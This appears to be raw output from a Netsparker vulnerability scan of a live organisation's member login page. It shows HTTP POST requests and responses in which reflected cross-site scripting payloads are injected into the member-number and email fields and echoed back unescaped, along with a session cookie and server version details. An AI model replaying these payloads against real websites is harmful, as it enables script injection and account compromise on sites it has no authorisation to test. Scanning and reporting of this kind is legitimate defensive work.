border-left: 1px solid #CCCCCC; border-right: 1px solid #CCCCCC; } input.TextField { width: 80%; max-width: 15em; } td#loginBlockThree { padding: 0; padding-left: 1%; border: none; } h2.loginBlock { padding: 0; margin: 0; border: none; } div#MemberNumberIdentification { display:none; } div#UsernameIdentification { display:none; } div#EmailFirstLastIdentification { display:none; } div#AccountResetIdentification { display:none; } --> </style> <div id="ColumnB"><h1>Member Login</h1> <form id="LogInForm" method="POST" action=""> <input type="hidden" name="d" value="https://www.issa.org/Members/Log-In.php"> <table style="position: relative"> <tr> <td id="loginBlockOne" width="33%"> <h2 class="loginBlock">1. Login Type</h2> <table> <tr> <td><input name="LoginType" type="radio" value="MemberNumber" id="UseMemberNumber" onMouseUp="SelectRadio('MemberNumber');" /></td> <td><label for="UseMemberNumber" onMouseUp="SelectRadio('MemberNumber');">Member Number</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="Username" id="UseUsername" onMouseUp="SelectRadio('Username');" /></td> <td><label for="UseUsername" onMouseUp="SelectRadio('Username');">Username</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="EmailFirstLast" id="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');" /></td> <td><label for="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');">E-mail, First Name, Last Name</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="AccountReset" id="UseAccountReset" onMouseUp="SelectRadio('AccountReset');" /></td> <td><label for="UseAccountReset" onMouseUp="SelectRadio('AccountReset');">New Account or Forgotten Password</label></td> </tr> </table> </td> <td id="loginBlockTwo" width="31%"> <h2 class="loginBlock">2. Identification</h2> <div id="MemberNumberIdentification"> <h3>Member Number</h3> <input type="text" id="MemberNumber" name="MemberNumber" class="TextField" value="3" /> </div> <div id="UsernameIdentification"> <h3>Username</h3> <input type="text" id="Username" name="Username" class="TextField" value="Smith" /> <p><strong>NOTE:</strong> Usernames are no longer issued. If you have one, you may use it; otherwise, please use your member number.</p> </div> <div id="EmailFirstLastIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddress" name="EmailAddress" class="TextField" value="netsparker@example.com" /> <h3>First Name</h3> <input type="text" id="FirstName" name="FirstName" class="TextField" value="Smith" /> <h3>Last Name</h3> <input type="text" id="LastName" name="LastName" class="TextField" value="Smith" /> </div> <div id="AccountResetIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddressReset" name="EmailAddressReset" class="TextField" value="netsparker@example.com" /> <p><input type="submit" id="Reset" value="Reset Password"></p> <p><strong>NOTE:</strong> if you don't know your e-mail address, please <a href="/Association/Contact.html">call ISSA</a> for password reset assistance.</p> </div> </td> <td id="loginBlockThree"> <h2 class="loginBlock">3. Password</h2> <h3>Password</h3> <input type="password" id="SubmittedPassword" nam..
Parameters
Parameter
|
Type
|
Value
|
EmailAddress
|
POST
|
netsparker@example.com
|
EmailAddressReset
|
POST
|
netsparker@example.com
|
FirstName
|
POST
|
Smith
|
LastName
|
POST
|
Smith
|
LoginType
|
POST
|
Username
|
MemberNumber
|
POST
|
'"--></style></script><script>alert(0x00006E)</script>
|
SubmittedPassword
|
POST
|
3
|
Username
|
POST
|
Smith
|
Request
POST /Members/Log-In.php HTTP/1.1
Referer: https://www.issa.org/Members/Log-In.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.issa.org
Cookie: cookiecheck=issa; PHPSESSID=d959e12eb1519d0294397b6c62589f93
Content-Length: 264
Accept-Encoding: gzip, deflate
EmailAddress=netsparker%40example.com&EmailAddressReset=netsparker%40example.com&FirstName=Smith&LastName=Smith&LoginType=Username&MemberNumber='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00006E)%3c%2fscript%3e&SubmittedPassword=3&Username=Smith
Response
HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:33:24 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b mod_bwlimited/1.4 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cookiecheck=issa
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Member Login</title>
<meta name="description" content="The ISSA is an unbiased third party made up solely of security practitioners and, as such, is not motivated by politics or profits; only the ethical professionalism of our members and their dedication to protecting information resources in a professional manner. ">
<meta name="keywords" content="security, security association, network security, internet security, data security">
<meta name="verify-v1" content="FwJolkV798m+nBxL9ELBCqQEogmxS8dxHUGv89Q1naM=" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link href="/css/FluidOneColumn.css" rel="stylesheet" type="text/css" />
<link href="/css/issa.css" rel="stylesheet" type="text/css" />
<link href="/css/nav.css" rel="stylesheet" type="text/css" />
<script type="text/javaScript" src="/js/jquery.js"></script>
<script type="text/javaScript" src="/js/nav.js"></script>
<script type="text/javaScript" src="/js/antispam.js"></script>
<script type="text/javaScript" src="/js/table.js"></script>
<script type="text/javascript">
<!--
$(document).ready(
function()
{
renderBanners();
alternateRowColors();
$("a[@name]").css({padding: "0", background: "none"});
var CurrentHeight = 0;
$(document).ready(function() {
resizeULs();
});
$(window).bind("resize", function() {
resizeULs();
});
}
);
function resizeULs()
{
$("ul.Layout").each(function(j) {
CurrentHeight = 0;
$(this).find("li").each(function(i) {
if (CurrentHeight < $(this).height()) {
CurrentHeight = $(this).height();
}
});
$(this).find("li").each(function(i) {
$(this).css("padding-bottom", (CurrentHeight - $(this).height() + i) + "px");
});
});
}
function resize(div){
var d=document.getElementById(div);
if(navigator.appName=="Microsoft Internet Explorer"){
//ie
if(navigator.appVersion.indexOf('MSIE')>0){
d.style.height=document.documentElement.scrollHeight;
}
}else if(navigator.userAgent.indexOf("Chrome")>0){
//chrome
d.style.height=document.body.scrollHeight+"px";
}else{
//ff and all other nice browsers
d.style.height=document.documentElement.scrollHeight+"px";
}
}
-->
</script>
<!--<script>
$(function(){
$('#Sponsors').cycle({
fx: 'fade',
delay: -500
});
});
</script>-->
</head>
<body>
<div id="wrapLeft">
<div id="wrapRight">
<div id="Container">
<div id="TopBar">
<a id="NewsFeed" href="https://connect.issa.org
">Log in and check out the new ISSA Connect!</a>
<a href="/" id="Home">Home</a>
<a href="/page/?p=Site_Map_2" id="SiteMap">Site Map</a>
<a href="/Members/Log-In.php" id="LogIn">Log In</a>
<a href="/page/?p=33" id="Contact">Contact</a>
</div>
<div id="LogoBar">
<div id="searchFormContainer">
<div id="searchForm">
<form name="search" method="get" action="/search.php">
<a href="javascript:document.search.submit();">search</a>
<input type="text" name="q" size="20" style="font-size:12px;border-width:1px;" />
</form>
</div>
</div>
<a href="/" id="Logo"></a>
<div style="width:409px;height:85px;">
</div>
</div>
<div id="nav">
<ul id="jsddm">
<li><a href="/page/?p=Profile_16">About ISSA</a>
<ul>
<li><a href="/page/?p=Profile_16">Association</a></li>
<li><a href="/page/?p=77">International Board</a></li>
<li><a href="/page/?p=17">Code of Ethics</a></li>
<li><a href="/page/?p=33">Contact</a></li>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<!--<li><a href="/Association/25year.html">25th Anniversary</a></li>-->
<li><a href="/page/?p=18">FAQ</a></li>
</ul>
</li>
<li><a href="https://connect.issa.org/index.jspa">Connect</a>
<ul>
<li><a href="/page/?p=Benefits_of_Membership_9">Benefits of Membership</a></li>
<li><a href="https://www.issa.org/page/?p=86">Dues</a></li>
<li><a href="https://connect.issa.org/index.jspa">ISSA Connect</a></li>
<li><a href="/page/?p=Application_Form_6">Membership Application</a></li>
<li><a href="/page/?p=Membership_Types_10">Membership Types</a></li>
<!--<li><a href="/page/?p=Join_Online_8">Join Online</a></li>-->
<!--<li><a href="/page/?p=Renew_Online_7">Renew Online</a></li>-->
</ul>
</li>
<li><a href="#">Learn</a>
<ul>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<li><a href="/News/">E-News</a></li>
<li><a href="/events/#2">Industry Events</a></li>
<li><a href="/page/?p=70">Industry Webinars</a></li>
<li><a href="/page/?p=105">International Conference</a></li>
<li><a href="/events/#1">ISSA Events</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/page/?p=57">ISSA Web Conferences</a></li>
<li><a href="/page/?p=Whitepapers_11">Whitepapers</a></li>
</ul>
</li>
<li><a href="#">Advance</a>
<ul>
<li><a href="/page/?p=21">Award - Honorees</a></li>
<li><a href="/page/?p=Careers_12">Career Center</a></li>
<li><a href="/page/?p=20">Community Outreach</a></li>
<li><a href="/page/?p=117">Educational Advisory Council</a></li>
<li><a href="/page/?p=269">Fellow Program</a></li>
<li><a href="/page/?p=Certifications_13">Industry Certifications</a></li>
</ul>
</li>
<li><a href="/Members/Your-Profile.html">Members</a>
<ul>
<li><a href="/page/?p=138">Elections</a></li>
<li><a href="/Resources/?p=SupportMaterials">Member Resources</a></li>
<li><a href="/Members/Member-Search.html">Member Search</a></li>
<li><a href="/page/?p=78">Membership Card</a></li>
<li><a href="/Members/Your-Profile.html">My Profile</a></li>
<li><a href="/page/?p=ISSA_Buyers_Guide_and_Discount_Directory_3">Special Offers</a></li>
<li><a href="/page/?p=Call_for_Volunteers_5">Volunteer</a></li>
</ul>
</li>
<li><a href="#">Chapters</a>
<ul>
<li><a href="/Chapters/Chapter-Administration.html">Admin</a></li>
<li><a href="/Chapters/Chapter-Directory.html">Chapter Directory</a></li>
<li><a href="/conf/?p=172">Chapter Leaders Congress</a></li>
<li><a href="/Chapters/?p=CPAC">CPAC Information</a></li>
<li><a href="/Members/Log-In.php">Officer Login</a></li>
<li><a href="/page/?p=27">Start a Chapter</a></li>
</ul>
</li>
<li><a href="#">Sponsorship</a>
<ul>
<li><a href="/page/?p=41">Become a Sponsor</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/Sponsorship/?p=MediaKit">Media Kit</a></li>
<li><a href="/page/?p=ISSA_Sponsors_39">Patron Sponsors</a></li>
</ul>
</li>
<li><a><span style="color:#FFB90F"><strong>Join Now</strong></span></a>
<ul>
<li><a href="/page/?p=Join_Online_8">New Members</a></li>
<li><a href="/Join/Renew-Online.html">Returning Members</a></li>
</ul>
</li>
</ul>
</div>
<div id="Content">
<script type="text/javascript" src="sha1.js"></script> <script language="javascript"> <!-- CurrentlyVisible = "Username"; function SelectRadio(IDtoSelect) { document.getElementById("Use" + IDtoSelect).checked="true"; document.getElementById(CurrentlyVisible + "Identification").style.display="none"; if (IDtoSelect == "AccountReset") { document.getElementById("loginBlockTwo").style.borderRight="none"; document.getElementById("loginBlockThree").style.display="none"; } else { document.getElementById("loginBlockTwo").style.borderRight="1px solid #CCCCCC"; document.getElementById("loginBlockThree").style.display="block"; } document.getElementById(IDtoSelect + "Identification").style.display="block"; if (IDtoSelect == 'EmailFirstLast') { ObjectSelected = document.getElementById('EmailAddress'); ObjectSelected.focus(); } else if (IDtoSelect == 'AccountReset') { ObjectSelected = document.getElementById('EmailAddressReset'); ObjectSelected.focus(); } else { ObjectSelected = document.getElementById(IDtoSelect); ObjectSelected.focus(); } CurrentlyVisible = IDtoSelect; } --> </script> <style type="text/css"> <!-- label:hover { cursor: pointer; } td#loginBlockOne { padding: 0; border: none; } td#loginBlockOne td { border: none; padding: .25em; vertical-align: middle; } td#loginBlockOne label { font-family: Tahoma, sans-serif; font-size: .9em; margin: 0; padding: 0; } td#loginBlockTwo { padding: 0; padding-left: 1%; border: none; border-left: 1px solid #CCCCCC; border-right: 1px solid #CCCCCC; } input.TextField { width: 80%; max-width: 15em; } td#loginBlockThree { padding: 0; padding-left: 1%; border: none; } h2.loginBlock { padding: 0; margin: 0; border: none; } div#MemberNumberIdentification { display:none; } div#UsernameIdentification { display:block; } div#EmailFirstLastIdentification { display:none; } div#AccountResetIdentification { display:none; } --> </style> <div id="ColumnB"> <p class="ErrorMessage"><strong>ERROR:</strong> The credentials provided do not match membership records. Please try again.</p><h1>Member Login</h1> <form id="LogInForm" method="POST" action=""> <input type="hidden" name="d" value="https://www.issa.org/Members/Log-In.php"> <table style="position: relative"> <tr> <td id="loginBlockOne" width="33%"> <h2 class="loginBlock">1. Login Type</h2> <table> <tr> <td><input name="LoginType" type="radio" value="MemberNumber" id="UseMemberNumber" onMouseUp="SelectRadio('MemberNumber');" /></td> <td><label for="UseMemberNumber" onMouseUp="SelectRadio('MemberNumber');">Member Number</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="Username" id="UseUsername" checked onMouseUp="SelectRadio('Username');" /></td> <td><label for="UseUsername" onMouseUp="SelectRadio('Username');">Username</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="EmailFirstLast" id="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');" /></td> <td><label for="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');">E-mail, First Name, Last Name</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="AccountReset" id="UseAccountReset" onMouseUp="SelectRadio('AccountReset');" /></td> <td><label for="UseAccountReset" onMouseUp="SelectRadio('AccountReset');">New Account or Forgotten Password</label></td> </tr> </table> </td> <td id="loginBlockTwo" width="31%"> <h2 class="loginBlock">2. Identification</h2> <div id="MemberNumberIdentification"> <h3>Member Number</h3> <input type="text" id="MemberNumber" name="MemberNumber" class="TextField" value="\'\"--></style></script><script>netsparker(0x00006E)</script>" /> </div> <div id="UsernameIdentification"> <h3>Username</h3> <input type="text" id="Username" name="Username" class="TextField" value="Smith" /> <p><strong>NOTE:</strong> Usernames are no longer issued. If you have one, you may use it; otherwise, please use your member number.</p> </div> <div id="EmailFirstLastIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddress" name="EmailAddress" class="TextField" value="netsparker@example.com" /> <h3>First Name</h3> <input type="text" id="FirstName" name="FirstName" class="TextField" value="Smith" /> <h3>Last Name</h3> <input type="text" id="LastName" name="LastName" class="TextField" value="Smith" /> </div> <div id="AccountResetIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddressReset" name="EmailAddressReset" class="TextField" value="netsparker@example.com" /> <p><input type="submit" id="Reset" value="Reset Password"></p> <p><strong>NOTE:</strong> if you don't know your e-mail address, please <a href="/Association/Contact.html">call ISSA</a> for password reset assistance.</p> </div> </td> <td id="loginBlockThree"> ..
Parameters
Parameter
|
Type
|
Value
|
d
|
POST
|
https://www.issa.org/Members/Log-In.php
|
EmailAddress
|
POST
|
'"--></style></script><script>alert(0x000098)</script>
|
EmailAddressReset
|
POST
|
netsparker@example.com
|
FirstName
|
POST
|
Smith
|
LastName
|
POST
|
Smith
|
LoginType
|
POST
|
MemberNumber
|
MemberNumber
|
POST
|
3
|
SubmittedPassword
|
POST
|
3
|
Username
|
POST
|
Smith
|
Request
POST /Members/Log-In.php HTTP/1.1
Referer: https://www.issa.org/Members/Log-In.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.issa.org
Cookie: cookiecheck=issa; PHPSESSID=d959e12eb1519d0294397b6c62589f93
Content-Length: 297
Accept-Encoding: gzip, deflate
d=https%3a%2f%2fwww.issa.org%2fMembers%2fLog-In.php&EmailAddress='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000098)%3c%2fscript%3e&EmailAddressReset=netsparker%40example.com&FirstName=Smith&LastName=Smith&LoginType=MemberNumber&MemberNumber=3&SubmittedPassword=3&Username=Smith
Response
HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:35:17 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b mod_bwlimited/1.4 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cookiecheck=issa
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Member Login</title>
<meta name="description" content="The ISSA is an unbiased third party made up solely of security practitioners and, as such, is not motivated by politics or profits; only the ethical professionalism of our members and their dedication to protecting information resources in a professional manner. ">
<meta name="keywords" content="security, security association, network security, internet security, data security">
<meta name="verify-v1" content="FwJolkV798m+nBxL9ELBCqQEogmxS8dxHUGv89Q1naM=" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link href="/css/FluidOneColumn.css" rel="stylesheet" type="text/css" />
<link href="/css/issa.css" rel="stylesheet" type="text/css" />
<link href="/css/nav.css" rel="stylesheet" type="text/css" />
<script type="text/javaScript" src="/js/jquery.js"></script>
<script type="text/javaScript" src="/js/nav.js"></script>
<script type="text/javaScript" src="/js/antispam.js"></script>
<script type="text/javaScript" src="/js/table.js"></script>
<script type="text/javascript">
<!--
$(document).ready(
function()
{
renderBanners();
alternateRowColors();
$("a[@name]").css({padding: "0", background: "none"});
var CurrentHeight = 0;
$(document).ready(function() {
resizeULs();
});
$(window).bind("resize", function() {
resizeULs();
});
}
);
function resizeULs()
{
$("ul.Layout").each(function(j) {
CurrentHeight = 0;
$(this).find("li").each(function(i) {
if (CurrentHeight < $(this).height()) {
CurrentHeight = $(this).height();
}
});
$(this).find("li").each(function(i) {
$(this).css("padding-bottom", (CurrentHeight - $(this).height() + i) + "px");
});
});
}
function resize(div){
var d=document.getElementById(div);
if(navigator.appName=="Microsoft Internet Explorer"){
//ie
if(navigator.appVersion.indexOf('MSIE')>0){
d.style.height=document.documentElement.scrollHeight;
}
}else if(navigator.userAgent.indexOf("Chrome")>0){
//chrome
d.style.height=document.body.scrollHeight+"px";
}else{
//ff and all other nice browsers
d.style.height=document.documentElement.scrollHeight+"px";
}
}
-->
</script>
<!--<script>
$(function(){
$('#Sponsors').cycle({
fx: 'fade',
delay: -500
});
});
</script>-->
</head>
<body>
<div id="wrapLeft">
<div id="wrapRight">
<div id="Container">
<div id="TopBar">
<a id="NewsFeed" href="https://connect.issa.org
">Log in and check out the new ISSA Connect!</a>
<a href="/" id="Home">Home</a>
<a href="/page/?p=Site_Map_2" id="SiteMap">Site Map</a>
<a href="/Members/Log-In.php" id="LogIn">Log In</a>
<a href="/page/?p=33" id="Contact">Contact</a>
</div>
<div id="LogoBar">
<div id="searchFormContainer">
<div id="searchForm">
<form name="search" method="get" action="/search.php">
<a href="javascript:document.search.submit();">search</a>
<input type="text" name="q" size="20" style="font-size:12px;border-width:1px;" />
</form>
</div>
</div>
<a href="/" id="Logo"></a>
<div style="width:409px;height:85px;">
</div>
</div>
<div id="nav">
<ul id="jsddm">
<li><a href="/page/?p=Profile_16">About ISSA</a>
<ul>
<li><a href="/page/?p=Profile_16">Association</a></li>
<li><a href="/page/?p=77">International Board</a></li>
<li><a href="/page/?p=17">Code of Ethics</a></li>
<li><a href="/page/?p=33">Contact</a></li>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<!--<li><a href="/Association/25year.html">25th Anniversary</a></li>-->
<li><a href="/page/?p=18">FAQ</a></li>
</ul>
</li>
<li><a href="https://connect.issa.org/index.jspa">Connect</a>
<ul>
<li><a href="/page/?p=Benefits_of_Membership_9">Benefits of Membership</a></li>
<li><a href="https://www.issa.org/page/?p=86">Dues</a></li>
<li><a href="https://connect.issa.org/index.jspa">ISSA Connect</a></li>
<li><a href="/page/?p=Application_Form_6">Membership Application</a></li>
<li><a href="/page/?p=Membership_Types_10">Membership Types</a></li>
<!--<li><a href="/page/?p=Join_Online_8">Join Online</a></li>-->
<!--<li><a href="/page/?p=Renew_Online_7">Renew Online</a></li>-->
</ul>
</li>
<li><a href="#">Learn</a>
<ul>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<li><a href="/News/">E-News</a></li>
<li><a href="/events/#2">Industry Events</a></li>
<li><a href="/page/?p=70">Industry Webinars</a></li>
<li><a href="/page/?p=105">International Conference</a></li>
<li><a href="/events/#1">ISSA Events</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/page/?p=57">ISSA Web Conferences</a></li>
<li><a href="/page/?p=Whitepapers_11">Whitepapers</a></li>
</ul>
</li>
<li><a href="#">Advance</a>
<ul>
<li><a href="/page/?p=21">Award - Honorees</a></li>
<li><a href="/page/?p=Careers_12">Career Center</a></li>
<li><a href="/page/?p=20">Community Outreach</a></li>
<li><a href="/page/?p=117">Educational Advisory Council</a></li>
<li><a href="/page/?p=269">Fellow Program</a></li>
<li><a href="/page/?p=Certifications_13">Industry Certifications</a></li>
</ul>
</li>
<li><a href="/Members/Your-Profile.html">Members</a>
<ul>
<li><a href="/page/?p=138">Elections</a></li>
<li><a href="/Resources/?p=SupportMaterials">Member Resources</a></li>
<li><a href="/Members/Member-Search.html">Member Search</a></li>
<li><a href="/page/?p=78">Membership Card</a></li>
<li><a href="/Members/Your-Profile.html">My Profile</a></li>
<li><a href="/page/?p=ISSA_Buyers_Guide_and_Discount_Directory_3">Special Offers</a></li>
<li><a href="/page/?p=Call_for_Volunteers_5">Volunteer</a></li>
</ul>
</li>
<li><a href="#">Chapters</a>
<ul>
<li><a href="/Chapters/Chapter-Administration.html">Admin</a></li>
<li><a href="/Chapters/Chapter-Directory.html">Chapter Directory</a></li>
<li><a href="/conf/?p=172">Chapter Leaders Congress</a></li>
<li><a href="/Chapters/?p=CPAC">CPAC Information</a></li>
<li><a href="/Members/Log-In.php">Officer Login</a></li>
<li><a href="/page/?p=27">Start a Chapter</a></li>
</ul>
</li>
<li><a href="#">Sponsorship</a>
<ul>
<li><a href="/page/?p=41">Become a Sponsor</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/Sponsorship/?p=MediaKit">Media Kit</a></li>
<li><a href="/page/?p=ISSA_Sponsors_39">Patron Sponsors</a></li>
</ul>
</li>
<li><a><span style="color:#FFB90F"><strong>Join Now</strong></span></a>
<ul>
<li><a href="/page/?p=Join_Online_8">New Members</a></li>
<li><a href="/Join/Renew-Online.html">Returning Members</a></li>
</ul>
</li>
</ul>
</div>
<div id="Content">
<script type="text/javascript" src="sha1.js"></script> <script language="javascript"> <!-- CurrentlyVisible = "MemberNumber"; function SelectRadio(IDtoSelect) { document.getElementById("Use" + IDtoSelect).checked="true"; document.getElementById(CurrentlyVisible + "Identification").style.display="none"; if (IDtoSelect == "AccountReset") { document.getElementById("loginBlockTwo").style.borderRight="none"; document.getElementById("loginBlockThree").style.display="none"; } else { document.getElementById("loginBlockTwo").style.borderRight="1px solid #CCCCCC"; document.getElementById("loginBlockThree").style.display="block"; } document.getElementById(IDtoSelect + "Identification").style.display="block"; if (IDtoSelect == 'EmailFirstLast') { ObjectSelected = document.getElementById('EmailAddress'); ObjectSelected.focus(); } else if (IDtoSelect == 'AccountReset') { ObjectSelected = document.getElementById('EmailAddressReset'); ObjectSelected.focus(); } else { ObjectSelected = document.getElementById(IDtoSelect); ObjectSelected.focus(); } CurrentlyVisible = IDtoSelect; } --> </script> <style type="text/css"> <!-- label:hover { cursor: pointer; } td#loginBlockOne { padding: 0; border: none; } td#loginBlockOne td { border: none; padding: .25em; vertical-align: middle; } td#loginBlockOne label { font-family: Tahoma, sans-serif; font-size: .9em; margin: 0; padding: 0; } td#loginBlockTwo { padding: 0; padding-left: 1%; border: none; border-left: 1px solid #CCCCCC; border-right: 1px solid #CCCCCC; } input.TextField { width: 80%; max-width: 15em; } td#loginBlockThree { padding: 0; padding-left: 1%; border: none; } h2.loginBlock { padding: 0; margin: 0; border: none; } div#MemberNumberIdentification { display:block; } div#UsernameIdentification { display:none; } div#EmailFirstLastIdentification { display:none; } div#AccountResetIdentification { display:none; } --> </style> <div id="ColumnB"> <p class="ErrorMessage"><strong>ERROR:</strong> The credentials provided do not match membership records. Please try again.</p><h1>Member Login</h1> <form id="LogInForm" method="POST" action=""> <input type="hidden" name="d" value="https://www.issa.org/Members/Log-In.php"> <table style="position: relative"> <tr> <td id="loginBlockOne" width="33%"> <h2 class="loginBlock">1. Login Type</h2> <table> <tr> <td><input name="LoginType" type="radio" value="MemberNumber" id="UseMemberNumber" checked onMouseUp="SelectRadio('MemberNumber');" /></td> <td><label for="UseMemberNumber" onMouseUp="SelectRadio('MemberNumber');">Member Number</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="Username" id="UseUsername" onMouseUp="SelectRadio('Username');" /></td> <td><label for="UseUsername" onMouseUp="SelectRadio('Username');">Username</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="EmailFirstLast" id="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');" /></td> <td><label for="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');">E-mail, First Name, Last Name</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="AccountReset" id="UseAccountReset" onMouseUp="SelectRadio('AccountReset');" /></td> <td><label for="UseAccountReset" onMouseUp="SelectRadio('AccountReset');">New Account or Forgotten Password</label></td> </tr> </table> </td> <td id="loginBlockTwo" width="31%"> <h2 class="loginBlock">2. Identification</h2> <div id="MemberNumberIdentification"> <h3>Member Number</h3> <input type="text" id="MemberNumber" name="MemberNumber" class="TextField" value="3" /> </div> <div id="UsernameIdentification"> <h3>Username</h3> <input type="text" id="Username" name="Username" class="TextField" value="Smith" /> <p><strong>NOTE:</strong> Usernames are no longer issued. If you have one, you may use it; otherwise, please use your member number.</p> </div> <div id="EmailFirstLastIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddress" name="EmailAddress" class="TextField" value="\'\"--></style></script><script>netsparker(0x000098)</script>" /> <h3>First Name</h3> <input type="text" id="FirstName" name="FirstName" class="TextField" value="Smith" /> <h3>Last Name</h3> <input type="text" id="LastName" name="LastName" class="TextField" value="Smith" /> </div> <div id="AccountResetIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddressReset" name="EmailAddressReset" class="TextField" value="netsparker@example.com" /> <p><input type="submit" id="Reset" value="Reset Password"></p> <p><strong>NOTE:</strong> if you don't know your e-mail address, please <a href="/Association/Contact.html">call ISSA</a> for password reset assistance.</p> </div> </td> <td id="loginBlockThree"> <h2 class..
Parameters
Parameter
|
Type
|
Value
|
d
|
POST
|
https://www.issa.org/Members/Log-In.php
|
EmailAddress
|
POST
|
netsparker@example.com
|
EmailAddressReset
|
POST
|
'"--></style></script><script>alert(0x00009B)</script>
|
FirstName
|
POST
|
Smith
|
LastName
|
POST
|
Smith
|
LoginType
|
POST
|
MemberNumber
|
MemberNumber
|
POST
|
3
|
SubmittedPassword
|
POST
|
3
|
Username
|
POST
|
Smith
|
Request
POST /Members/Log-In.php HTTP/1.1
Referer: https://www.issa.org/Members/Log-In.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.issa.org
Cookie: cookiecheck=issa; PHPSESSID=d959e12eb1519d0294397b6c62589f93
Content-Length: 297
Accept-Encoding: gzip, deflate
d=https%3a%2f%2fwww.issa.org%2fMembers%2fLog-In.php&EmailAddress=netsparker%40example.com&EmailAddressReset='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00009B)%3c%2fscript%3e&FirstName=Smith&LastName=Smith&LoginType=MemberNumber&MemberNumber=3&SubmittedPassword=3&Username=Smith
Response
HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:35:28 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b mod_bwlimited/1.4 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cookiecheck=issa
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Member Login</title>
<meta name="description" content="The ISSA is an unbiased third party made up solely of security practitioners and, as such, is not motivated by politics or profits; only the ethical professionalism of our members and their dedication to protecting information resources in a professional manner. ">
<meta name="keywords" content="security, security association, network security, internet security, data security">
<meta name="verify-v1" content="FwJolkV798m+nBxL9ELBCqQEogmxS8dxHUGv89Q1naM=" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link href="/css/FluidOneColumn.css" rel="stylesheet" type="text/css" />
<link href="/css/issa.css" rel="stylesheet" type="text/css" />
<link href="/css/nav.css" rel="stylesheet" type="text/css" />
<script type="text/javaScript" src="/js/jquery.js"></script>
